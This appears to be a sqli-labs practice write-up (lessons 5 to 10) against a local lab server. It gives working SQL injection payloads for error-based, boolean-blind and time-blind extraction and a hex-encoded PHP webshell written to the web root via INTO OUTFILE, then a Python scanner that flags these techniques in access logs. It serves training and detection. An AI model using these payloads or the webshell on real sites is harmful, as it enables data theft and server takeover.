Less-5
- Enter the correct URL
  http://192.168.12.129:81/sqli-labs/Less-5/?id=1 # You are in........... # no query result is displayed
- Determine the injection type
  http://192.168.12.129:81/sqli-labs/Less-5/?id=1' # You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1 # this confirms a string-type injection, closed with a single quote
- Use error-based injection
  http://192.168.12.129:81/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,database(),0x7e),1)--+ # XPATH syntax error: '~security~'
- Dump the database, tables and columns
  http://192.168.12.129:81/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,50),0x7e),1)--+
  http://192.168.12.129:81/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,50),0x7e),1)--+
Less-6
- Enter the correct URL
  http://192.168.12.129:81/sqli-labs/Less-6/?id=1 # You are in........... # no query result is displayed
- Determine the injection type
  http://192.168.12.129:81/sqli-labs/Less-6/?id=1' # You are in...........
  http://192.168.12.129:81/sqli-labs/Less-6/?id=1" # You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1 # this confirms a string-type injection, closed with a double quote
- Use error-based injection
  http://192.168.12.129:81/sqli-labs/Less-6/?id=1" and updatexml(1,concat(0x7e,database(),0x7e),1)--+
  # or
  http://192.168.12.129:81/sqli-labs/Less-6/?id=1" and extractvalue(1,concat(0x7e,database(),0x7e)) --+ # XPATH syntax error: '~security~'
- Dump the database, tables and columns
  http://192.168.12.129:81/sqli-labs/Less-6/?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,50),0x7e),1)--+
  http://192.168.12.129:81/sqli-labs/Less-6/?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,50),0x7e),1)--+
Less-7
- Enter the correct URL
  http://192.168.12.129:81/sqli-labs/Less-7/?id=1 # You are in.... Use outfile...... # no result is displayed; the hint says to use outfile
- Determine the injection type
  http://192.168.12.129:81/sqli-labs/Less-7/?id=1' # You have an error in your SQL syntax
  http://192.168.12.129:81/sqli-labs/Less-7/?id=1' --+ # You have an error in your SQL syntax
  http://192.168.12.129:81/sqli-labs/Less-7/?id=1') --+ # You have an error in your SQL syntax
  http://192.168.12.129:81/sqli-labs/Less-7/?id=1')) --+ # You are in.... Use outfile...... # this confirms a string-type injection, closed with '))
- Use outfile to write a webshell
  http://192.168.12.129:81/sqli-labs/Less-7/?id=1')) union select 1,2,'0x3c3f706870206576616c28245f504f53545b22636d64225d293b3f3e' into outfile "/opt/lampp/htdocs/whm.php"--+ # You have an error in your SQL syntax
- Use China Chopper
- Add the URL
- Success
Less-8
- Enter the correct URL
  http://192.168.12.129:81/sqli-labs/Less-8/?id=1 # You are in...........
- Determine the injection type
  http://192.168.12.129:81/sqli-labs/Less-8/?id=1' # nothing is displayed
  http://192.168.12.129:81/sqli-labs/Less-8/?id=1" # You are in...........
  http://192.168.12.129:81/sqli-labs/Less-8/?id=1' --+ # You are in........... # this confirms a string-type injection, closed with '
- Try time-based blind injection
  http://192.168.12.129:81/sqli-labs/Less-8/?id=1' and if(length(database())=8,sleep(3),1)--+ # the page takes about 3 seconds to load # so the database name is 8 characters long
- Use boolean-based blind injection to brute-force the database name
  http://192.168.12.129:81/sqli-labs/Less-8/?id=1' and substr(database(),1,1)='s' --+ # this can be scripted to brute-force the database name # brute-forcing yields the database name: security
Less-9
- Enter the correct URL
  http://192.168.12.129:81/sqli-labs/Less-9/?id=1 # You are in...........
- Determine the injection type
  http://192.168.12.129:81/sqli-labs/Less-9/?id=1'
  http://192.168.12.129:81/sqli-labs/Less-9/?id=1"
  http://192.168.12.129:81/sqli-labs/Less-9/?id=1')
  http://192.168.12.129:81/sqli-labs/Less-9/?id=1")
  http://192.168.12.129:81/sqli-labs/Less-9/?id=1 and 1=2
  http://192.168.12.129:81/sqli-labs/Less-9/?id=-1 # You are in........... # tricky
  http://192.168.12.129:81/sqli-labs/Less-9/?id=1 and sleep(3) # still # You are in...........
  http://192.168.12.129:81/sqli-labs/Less-9/?id=1' and sleep(3)--+ # the page takes about 3 seconds to load # scripting the brute-force is recommended; this confirms closure with '
- Time-based blind injection
  http://192.168.12.129:81/sqli-labs/Less-9/?id=1' and if(length(database())=8,sleep(3),1)--+ # the page takes about 3 seconds to load # so the database name is 8 characters long
  http://192.168.12.129:81/sqli-labs/Less-9/?id=1' and if(substr(database(),1,1)='s',sleep(3),1)--+ # this can be scripted to brute-force the database name # brute-forcing yields the database name: security
Less-10
- Enter the correct URL
  http://192.168.12.129:81/sqli-labs/Less-10/?id=1 # You are in...........
- Determine the injection type
  http://192.168.12.129:81/sqli-labs/Less-10/?id=1" and sleep(3)--+ # the page takes about 3 seconds to load # well, nothing more to say: same as Less-9, scripting the brute-force is recommended; this confirms closure with "
- Try time-based blind injection
  http://192.168.12.129:81/sqli-labs/Less-10/?id=1" and if(length(database())=8,sleep(3),1)--+ # the page takes about 3 seconds to load # so the database name is 8 characters long
  http://192.168.12.129:81/sqli-labs/Less-10/?id=1" and if(substr(database(),1,1)='s',sleep(3),1)--+ # this can be scripted to brute-force the database name # brute-forcing yields the database name: security
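Every probe in Less-5 through Less-10 leaves a recognisable signature in the web server's access log: a bare quote-closure test, updatexml()/extractvalue() for error-based extraction, sleep() for time-based blind, UNION SELECT ... INTO OUTFILE for the file write, and information_schema lookups. The following Python scanner is an added example, not part of this write-up or of sqli-labs; it parses constructed Apache-style log lines (the client IP, timestamps, sizes and the truncated outfile payload are made up) and tags each flagged parameter with the technique it matches.

```python
import re
from urllib.parse import parse_qsl

# Constructed Apache-style access-log lines modelled on the probes in this write-up;
# the client IP, timestamps and sizes are made up, and the outfile payload is truncated.
SAMPLE_LOG = """\
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli-labs/Less-5/?id=1 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli-labs/Less-5/?id=1%27%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)--+ HTTP/1.1" 200 640
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /sqli-labs/Less-7/?id=1%27))%20union%20select%201,2,%27x%27%20into%20outfile%20%22/tmp/x.php%22--+ HTTP/1.1" 200 640
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /sqli-labs/Less-8/?id=1%27%20--+ HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /sqli-labs/Less-9/?id=1%27%20and%20if(length(database())=8,sleep(3),1)--+ HTTP/1.1" 200 512
"""

# Request line inside a common/combined log entry.
REQ = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# One rule per technique used in this lab; each regex runs over the
# URL-decoded, lower-cased value of a single query parameter.
RULES = {
    "quote_probe": re.compile(r"""^\d+['"]\)*\s*(--|#)?\s*$"""),
    "error_based": re.compile(r"\b(updatexml|extractvalue)\s*\("),
    "time_based": re.compile(r"\bsleep\s*\("),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "file_write": re.compile(r"\binto\s+(out|dump)file\b"),
    "schema_enum": re.compile(r"\binformation_schema\."),
}


def classify(value):
    """Return the sorted technique names whose rule matches the decoded value."""
    v = value.lower()
    return sorted(name for name, rx in RULES.items() if rx.search(v))


def scan_log(text):
    """Return one finding per flagged query parameter: path, param, techniques, decoded value."""
    findings = []
    for line in text.splitlines():
        m = REQ.search(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        # parse_qsl percent-decodes and turns '+' into a space, so '--+' becomes '-- '.
        for name, value in parse_qsl(query, keep_blank_values=True):
            hits = classify(value)
            if hits:
                findings.append({"path": path, "param": name, "techniques": hits, "value": value})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["path"], f["param"], ",".join(f["techniques"]), repr(f["value"]))
```

The benign request on the first line produces no finding; a real deployment would read the log incrementally and alert on any hit, with the time_based and file_write rules treated as highest priority since they indicate blind extraction and an attempt to drop a file on the web root.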